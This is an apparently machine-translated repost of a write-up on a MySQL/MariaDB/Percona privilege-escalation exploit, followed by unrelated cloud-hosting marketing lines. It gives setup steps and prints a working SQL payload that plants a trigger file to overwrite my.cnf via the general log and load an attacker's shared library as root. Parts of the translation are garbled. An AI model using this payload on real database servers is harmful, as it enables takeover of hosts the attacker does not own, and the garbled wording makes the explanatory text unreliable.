MySQL <= 5.7.15 Remote Code Execution/power (0day) version of 5.6.33 5.5.52Mysql branch is also affected, including: MariaDB perconadb
Create a Bob user and give File,select,insert permissions to create database Activedb and tables for experimentation active_table
The exp is written to the TMP directory and compiled into so files, and the location of Ip,port and MY.CNF needs to be modified.
Select "Type=triggers\ntriggers= ' CREATE definer= ' root ' @ ' localhost ' TRIGGER active_table\nafter insert\n on ' Active_table ' For each row\nbegin\n DECLARE void varchar (550); \ n set global general_log_file=\\\ '/etc/mysql/ my.cnf\\\ '; \ n set global general_log = on;\n select \ "\n[mysqld]\nmalloc_lib=\\\ '/tmp/mysql_hookandroot_ lib.so\\\ ' \n\ ' into void; \ n Set global general_log = Off;\nend ' \nsql_modes=1073741824\ndefiners= ' [email protected] ' \nclient_cs_names= ' Latin1 ' \nconnection_cl_names= ' latin1_swedish_ci ' \ndb_cl_names= ' latin1_swedish_ci ' "into DumpFile '/var/lib/mysql/ Activedb/active_table. TRG ';
Find writable MY.CNF will be ignored??? Don't know why (did you patch it?) ), do not know 5.5 of the situation will be what, so first change the authority of the MY.CNF back 744
Article forwarded to: http://blog.0kami.cn/2016/09/18/cve-2016-6663-mysql-exp/
MySQL method of extracting weights
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
